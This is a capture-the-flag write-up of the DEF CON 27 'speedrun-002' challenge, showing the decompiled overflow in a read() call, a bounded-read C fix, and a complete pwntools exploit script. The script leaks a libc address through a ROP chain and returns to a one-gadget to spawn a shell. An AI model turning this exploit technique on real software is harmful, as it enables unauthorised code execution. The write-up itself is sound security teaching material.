Defcon27 Speedrun 002 Writeup

LeeDoHyun · March 2, 2020

I spent an hour flailing around trying to solve this one.

[email protected]:/home/defcon27# file speedrun-002
speedrun-002: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=fb0684e50a97ccfc5dbe71bcdcb4a45aacfed414, stripped

It is a 64-bit ELF file.

ssize_t __fastcall sub_400705(void *a1)
{
  puts("What an interesting thing to say.\nTell me more.");
  read(0, a1, 0x7DAuLL);                         // overflow
  return write(1, "Fascinating.\n", 0xDuLL);
}

This is the function where the vulnerability triggers: read() accepts up to 0x7DA bytes into the buffer, so it overflows.
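As an added example (not from the writeup), a bounded replacement for the read() call in sub_400705, with a self-check that pushes the full 0x7DA bytes through a pipe and confirms nothing past the buffer is written; the 0x400 buffer size is an assumption taken from the 0x400 + 8 padding used in ex.py.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 0x400   /* stack buffer size; assumed from the 0x400 + 8 padding in ex.py */
#define READ_LEN 0x7DA   /* length passed to read() in sub_400705 */

/* Hardened form: the capacity travels with the buffer, the read is capped at
 * bufsz - 1, and the result is NUL-terminated so later string calls stay in bounds. */
ssize_t bounded_read(int fd, char *buf, size_t bufsz)
{
    if (buf == NULL || bufsz == 0)
        return -1;
    ssize_t n = read(fd, buf, bufsz - 1);
    if (n < 0)
        return n;
    buf[n] = '\0';
    return n;
}

/* Self-check: push READ_LEN bytes (the most the original read() would accept)
 * through a pipe and report how many bytes bounded_read() actually stored. */
ssize_t bounded_read_selftest(void)
{
    char buf[BUF_SIZE];
    static char input[READ_LEN];   /* constructed oversized input */
    int fds[2];
    memset(input, 'A', sizeof input);
    if (pipe(fds) != 0)
        return -1;
    if (write(fds[1], input, sizeof input) != (ssize_t)sizeof input) {
        close(fds[0]); close(fds[1]);
        return -1;
    }
    close(fds[1]);
    ssize_t n = bounded_read(fds[0], buf, sizeof buf);
    close(fds[0]);
    return n;   /* 0x3FF: the buffer and nothing beyond it */
}

int main(void)
{
    printf("bounded_read kept %zd of %d bytes\n", bounded_read_selftest(), READ_LEN);
    return 0;
}
```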

Simply find pop_rdi, puts_plt, puts_got and ret, plug in a one-gadget, and the challenge is solved.

ex.py

from pwn import *

context.log_level = "debug"
r = process("./speedrun-002")
e = ELF("./speedrun-002")
libc = e.libc

# Gadgets from the binary; one_gadget is an offset into the local libc
pop_rdi = 0x4008a3
puts_plt = e.plt["puts"]
puts_got = e.got["puts"]
ret = 0x400576
one_gadget = 0x4526a

# Stage 1: leak the libc address of puts via puts(puts@got)
r.recvuntil(b"What say you now?")
r.sendline(b"Everything intelligent is so boring.")
r.recvuntil(b"What an interesting thing to say.\nTell me more.")

payload = b"A" * (0x400 + 0x8)   # fill the 0x400 buffer plus the saved rbp
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(ret)              # address returned to after the leak
r.sendline(payload)

r.recvuntil(b"Fascinating.\n")
puts_leak = u64(r.recv(6) + b"\x00\x00")   # 6-byte address padded to 8
info("puts leak = " + hex(puts_leak))
base = puts_leak - libc.symbols["puts"]
binsh = base + one_gadget

# Stage 2: overwrite the return address with the one-gadget
r.recvuntil(b"What say you now?")
r.sendline(b"Everything intelligent is so boring.")
r.recvuntil(b"What an interesting thing to say.\nTell me more.")

payload = b"A" * (0x400 + 0x8)
payload += p64(binsh)
payload += p64(0) * 8            # zeroed stack slots to satisfy the gadget's constraints
r.sendline(payload)
r.interactive()
